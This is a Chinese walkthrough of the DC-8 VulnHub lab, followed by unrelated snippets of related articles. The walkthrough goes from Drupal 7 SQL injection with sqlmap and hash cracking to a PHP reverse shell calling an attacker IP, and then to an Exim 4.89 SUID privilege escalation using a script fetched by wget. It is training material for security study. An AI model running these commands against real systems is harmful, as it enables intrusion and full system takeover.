当前位置: 首页 > article >正文

从Drupal后台到Root权限:手把手复现DC-8靶场的Exim 4.89提权完整流程

从Drupal后台到Root权限手把手复现DC-8靶场的Exim 4.89提权完整流程在渗透测试的学习过程中靶机环境是最接近实战的训练场。DC-8作为VulnHub上经典的Drupal靶机提供了一个从Web漏洞到系统提权的完整攻击链。本文将深入剖析如何从Drupal 7的SQL注入漏洞入手逐步获取系统控制权最终利用Exim 4.89的SUID漏洞实现权限提升。1. 环境准备与信息收集任何渗透测试的第一步都是充分了解目标环境。我们使用Kali Linux作为攻击机与DC-8靶机处于同一局域网段。首先进行基础网络扫描确认靶机IP和开放服务netdiscover -r 192.168.108.0/24 nmap -sV -p- 192.168.108.141扫描结果显示靶机开放了两个关键服务22/tcp: OpenSSH 7.4p180/tcp: Apache httpd (Drupal CMS)通过目录扫描工具发现Drupal的典型结构dirb http://dc-8关键发现URL中存在?nid1参数这是Drupal常见的节点ID传参方式也是后续注入攻击的入口点。2. 利用SQL注入获取后台访问权限Drupal 7存在已知的SQL注入漏洞我们可以使用sqlmap进行自动化利用sqlmap -u http://dc-8/?nid* --risk3 --level5 --batch分步骤获取数据库信息确认当前数据库用户权限枚举数据库表结构提取用户凭证数据最终获取到两个关键用户凭证admin: $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5zjohn: $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF使用John the Ripper破解哈希john --wordlist/usr/share/wordlists/rockyou.txt hash.txt成功破解出john用户的密码为turtle这为我们提供了后台管理权限。3. 从后台到代码执行登录Drupal后台(http://dc-8/user)后我们发现可以通过内容编辑功能执行PHP代码。测试几种不同的反弹shell方式?php system(bash -i /dev/tcp/192.168.108.129/6868 01); ?在Kali上监听对应端口nc -lvnp 6868成功获取反向shell后首先升级为完全交互式终端python -c import pty; pty.spawn(/bin/bash)4. 权限提升Exim 4.89漏洞利用在低权限shell中我们检查SUID文件寻找提权机会find / -perm -4000 -type f 2/dev/null发现/usr/sbin/exim4具有SUID位且属主为root。检查版本exim4 --version确认版本为4.89后搜索已知漏洞searchsploit exim 4.89找到本地提权漏洞(CVE-2019-10149)下载并执行利用脚本wget http://192.168.108.129:9999/46996.sh -O /tmp/exploit.sh chmod x /tmp/exploit.sh /tmp/exploit.sh -m netcat成功获取root shell后可以在/root目录下找到最终的flag文件。技术原理深度解析SUID机制的安全隐患SUID(Set User ID)是Linux的一种特殊权限设置它允许用户以文件所有者的权限执行程序。当root用户拥有的程序设置了SUID位时任何执行该程序的用户都将临时获得root权限。如果这类程序存在漏洞就可能被利用来提升权限。Exim漏洞利用原理Exim 4.89的漏洞源于其对字符串处理的缺陷。攻击者可以通过精心构造的参数在调用特定函数时触发缓冲区溢出从而执行任意代码。由于exim以root权限运行这个漏洞可以直接获取root shell。防御建议及时更新软件Exim在后续版本中修复了该漏洞最小权限原则避免为不必要的程序设置SUID位输入验证对用户输入进行严格过滤日志监控关注异常进程执行行为这个案例展示了从Web应用到系统底层的完整攻击链理解每个环节的技术原理对安全防护至关重要。在实际渗透测试中类似的思路可以应用于许多现代Web应用系统。

相关文章:

从Drupal后台到Root权限:手把手复现DC-8靶场的Exim 4.89提权完整流程

从Drupal后台到Root权限:手把手复现DC-8靶场的Exim 4.89提权完整流程 在渗透测试的学习过程中,靶机环境是最接近实战的训练场。DC-8作为VulnHub上经典的Drupal靶机,提供了一个从Web漏洞到系统提权的完整攻击链。本文将深入剖析如何从Drupal 7…...

毕业设计:基于springboot的乐享田园系统(源码)

目录 第4章 系统设计 4.1 系统设计思想 4.2 功能结构设计 4.3 数据库设计 4.3.1 数据库概念设计 4.3.2 数据库物理设计 第5章系统实现 5.1 管理员功能实现 5.1.1 农民管理 5.1.2 用户管理 5.1.3 用户建议管理 5.1.4 种植详情管理 5.2 农民功能实现 5.2.1 土地管理…...

保姆级教程:用PyTorch 2.0复现WDCNN轴承故障诊断模型(附CWRU数据集实战代码)

从零实现WDCNN轴承故障诊断:PyTorch 2.0实战指南 轴承作为机械设备的核心部件,其健康状态直接影响整个系统的运行安全。传统故障诊断方法依赖专家经验,而深度学习技术让自动化诊断成为可能。WDCNN(Wide Deep Convolutional Neural…...

毕业设计:基于springboot的网上服装商城(源码)

目录 第四章 系统设计 4.1 总体功能 4.2 系统模块设计 4.3 数据库设计 4.3.1 数据库概念设计 4.3.2 数据库表设计 第五章 系统实现 5.1 管理员功能模块的实现 5.1.1 服装列表 5.1.2 公告信息管理 5.1.3 公告类型管理 第四章 系统设计 4.1 总体功能 网上服装商城是…...

别再死记硬背回溯算法了!用Python可视化带你玩转八皇后问题(附完整代码)

用Python动画拆解八皇后问题:从算法恐惧到视觉愉悦 第一次接触回溯算法时,你是否也被那些自我调用的递归函数和抽象的状态回退弄得头晕目眩?八皇后问题作为算法学习的经典案例,本应是理解回溯思想的绝佳入口,却常常因为…...

Maple Mono终极指南:如何快速打造你的完美编程字体体验

Maple Mono终极指南:如何快速打造你的完美编程字体体验 【免费下载链接】maple-font Maple Mono: Open source monospace font with round corner, ligatures and Nerd-Font icons for IDE and terminal, fine-grained customization options. 带连字和控制台图标的…...

别再搞混了!Ubuntu 20.04上安装linux-headers-generic和指定版本有啥区别?

深度解析Ubuntu内核头文件管理:generic元包与指定版本的选择策略 每次内核升级后重新编译驱动时,总会遇到那个经典问题——该用linux-headers-generic还是精确版本号安装?上周帮同事排查一个WiFi驱动兼容性问题时,发现他系统里同…...

避坑指南:CEEMDAN参数(Nstd, NE, MaxIter)怎么调?附MATLAB代码与效果对比

CEEMDAN参数调优实战:从振动信号到金融时序的分解艺术 第一次接触CEEMDAN算法时,我被它那串看似简单的参数列表彻底难住了。Nstd、NE、MaxIter——这三个缩写背后藏着无数个不眠之夜和崩溃的MATLAB运行窗口。记得在分析风力发电机轴承振动数据时&#xf…...

别再乱用事件过滤器了!Qt中让QLineEdit智能失焦的两种正确姿势(附QCompleter处理)

Qt中QLineEdit智能失焦的工程实践:从事件过滤器到焦点策略的进阶之路 在Qt开发中,QLineEdit的焦点管理看似简单,实则暗藏玄机。许多开发者习惯性地使用全局事件过滤器来处理失焦逻辑,这不仅增加了代码复杂度,还可能引发…...

宝塔面板无法识别数据库配置_检查配置文件是否存在乱码

...

华为防火墙双活链路部署避坑指南:IP-LINK和BFD到底该怎么选?

华为防火墙双活链路部署实战:IP-LINK与BFD技术选型深度解析 当企业网络架构面临双活链路部署时,华为防火墙的链路检测机制选择往往成为关键决策点。作为网络架构师,我们常常需要在IP-LINK和BFD两种主流方案间做出权衡——这不仅关乎网络稳定性…...

Excel工作表保护密码忘了?除了VBA宏,这3种官方和第三方方法你也该知道

Excel工作表保护密码遗忘后的全方位解决方案指南 你是否曾经遇到过这样的尴尬场景:精心设计的Excel表格设置了保护密码,却在关键时刻怎么也想不起那几个关键字符?作为一位常年与数据打交道的专业人士,我完全理解这种困境带来的挫败…...

Rdkit|从静态到交互:分子可视化的进阶实践

1. 从静态图片到交互探索:为什么需要升级分子可视化? 在药物研发和材料科学领域,分子可视化从来都不只是"看看结构"那么简单。十年前我刚入行时,实验室的电脑屏幕上总是堆满各种静态分子图片,研究员们需要靠…...

Rdkit|分子可视化实战:从基础绘制到批量生成与3D展示

1. 从零开始认识Rdkit分子可视化 第一次接触Rdkit时,我被它强大的分子处理能力震撼了。作为一个开源的化学信息学工具包,Rdkit不仅能解析SMILES字符串,还能生成高质量的分子图像。记得当时我需要快速评估一批化合物的结构特征,传统…...

手机拍HDR总有重影?聊聊动态场景多帧融合的演进与手机摄影中的实际应用

手机HDR摄影中的重影难题:技术演进与实战解决方案 当你在黄昏时分举起手机,试图用HDR模式捕捉天边的晚霞与地面建筑的细节时,是否经常发现画面中走动的人物边缘出现了诡异的"重影"?这种被称为"鬼影"的现象&am…...

从立创EDA到AD20:一个PCB新手的完整避坑与实战布局指南

从立创EDA到AD20:PCB设计新手的实战避坑指南 第一次打开AD20的界面时,那种扑面而来的专业感既让人兴奋又令人忐忑。作为从立创EDA转战Altium Designer的工程师,我深刻理解这种"工具升级焦虑"——就像从自行车突然换到方程式赛车&am…...

手把手教你配置UART:9600 8N1模式下的数据传输实战(含示波器截图)

手把手教你配置UART:9600 8N1模式下的数据传输实战 在嵌入式开发中,UART(通用异步收发传输器)是最基础也最常用的通信接口之一。无论是调试信息输出、传感器数据采集,还是设备间的简单通信,UART都扮演着重要…...

告别纸上谈兵!用Keil uVision5和Proteus 8.9从零搭建51单片机流水灯(附完整资源包)

从零构建51单片机流水灯:Keil与Proteus实战避坑指南 当你第一次接触单片机开发时,是否曾被各种专业术语和复杂的工具链劝退?本文将带你用最直观的方式,完成第一个51单片机仿真项目——流水灯。不同于网上零散的教程,这…...

SQL如何检查字符串是否存在:INSTR与LOCATE函数使用

MySQL中查子串应优先用LOCATE以兼顾SQL标准兼容性,INSTR为MySQL特有;二者功能相同但参数顺序相反,查不到返回0,查到返回从1开始的位置,NULL输入返回NULL,且均不走索引。MySQL里查子串用 LOCATE 还是 INSTR&…...

LaTeX新人避坑指南:用gbt7714-numerical.bst和gbt7714.sty排版参考文献,如何避免‘上标’陷阱与版本冲突报错

LaTeX参考文献排版实战:从版本冲突到样式控制的完整解决方案 第一次用LaTeX写中文论文时,我对着满屏的红色编译错误和诡异的参考文献上标差点崩溃。直到凌晨三点才发现,原来从不同地方下载的.bst和.sty文件就像不兼容的USB接口——看似能插&a…...

51单片机+DHT11温湿度传感器保姆级教程:从接线到LCD1602显示,附串口调试避坑指南

51单片机与DHT11温湿度传感器实战指南:从硬件搭建到数据可视化全解析 第一次接触51单片机和传感器的新手们,是否曾被那些密密麻麻的引脚和复杂的时序图吓退?温湿度检测作为物联网中最基础却又最实用的功能之一,其实并没有想象中那…...

别再为OTA升级失败抓狂了!手把手教你排查涂鸦IoT平台MCU固件升级的6个常见坑

涂鸦IoT平台MCU固件OTA升级故障排查实战指南 当你的智能设备固件升级卡在98%时,那种感觉就像看着下载进度条停在99%——既焦虑又无奈。作为嵌入式开发者,我们深知OTA升级失败不仅影响用户体验,更可能引发现场设备大规模故障。本文将带你深入涂…...

从STM32换到GD32,串口通信就崩了?聊聊MCU串口IP核那些‘看不见’的差异

从STM32迁移到GD32:串口通信失效背后的硬件设计哲学解析 当工程师们满怀期待地将项目从STM32平台迁移至国产GD32系列时,往往会在串口通信这个看似基础的功能上遭遇意想不到的挫折。特别是在RS-422/485等转换接口场景下,原本在STM32上稳定运行…...

别再被dom4j的‘前言中不允许有内容’搞懵了!手把手教你用XmlMapper搞定Java对象转XML

告别dom4j解析噩梦:用Jackson XmlMapper优雅处理Java对象转XML 深夜调试代码时,突然蹦出org.dom4j.DocumentException: 前言中不允许有内容的报错——这场景Java开发者都不陌生。当我们需要将Java对象转为XML格式时,传统dom4j库对XML格式的严…...

Android 7.1设备开机后上不了网?手把手教你排查APN加载与DcTracker拨号流程

Android 7.1网络连接故障深度排查指南:从APN加载到DcTracker拨号全流程解析 当Android设备开机后无法正常上网,这往往涉及系统底层的复杂交互过程。本文将带您深入Telephony框架,从APN配置加载到DcTracker拨号决策,逐步拆解网络连…...

微积分基本定理实战:5个常见积分上限函数求导案例解析

微积分基本定理实战:5个常见积分上限函数求导案例解析 在工程建模和物理问题分析中,积分上限函数的求导运算堪称"数学瑞士军刀"。想象一下,当你需要分析随时间变化的流量、计算变力做功或优化控制系统参数时,这个工具能…...

手把手教你用Docker Compose在Ubuntu 22.04上部署LangSmith监控平台(含PostgreSQL+Redis+ClickHouse配置)

基于Docker Compose的LangSmith全栈监控平台部署指南 在当今AI技术快速迭代的背景下,构建可观测的LLM应用开发环境已成为技术团队的刚需。LangSmith作为LangChain生态中的核心监控工具,能够帮助开发者实时追踪模型调用、分析性能瓶颈并优化工作流程。本文…...

告别双for循环!用NumPy的np.where()函数6倍速搞定医学图像分割可视化(附Synapse数据集实战代码)

医学图像分割可视化性能革命:用NumPy向量化操作替代低效循环 在医学影像分析领域,分割模型的可视化结果直接影响临床医生和研究人员对模型性能的直观判断。然而,许多深度学习工程师都会遇到一个令人头疼的问题:模型推理过程可能只…...

【计算机组成原理实践】从门电路到运算器:Logisim 搭建加减法器全流程解析

1. 从开关到计算:门电路的前世今生 记得我第一次接触数字逻辑电路时,被那些密密麻麻的连线搞得头晕眼花。直到有一天,导师拿着几个面包板和LED灯对我说:"计算机的本质,不过是一堆开关的排列组合。"这句话彻底…...

基于DSP28335的三电平有源电力滤波器方案:全套软硬件资料,直接量产的智能化电力管理方案

三电平有源电力滤波器方案 全套软硬件资料 基于DSP28335 可以直接量产一、概述 某TD_APF(Active Power Filter,有源电力滤波器)固件基于DSP28335芯片开发,是一套功能完备、架构严谨的嵌入式实时控制系统。该固件围绕电网谐波治理核…...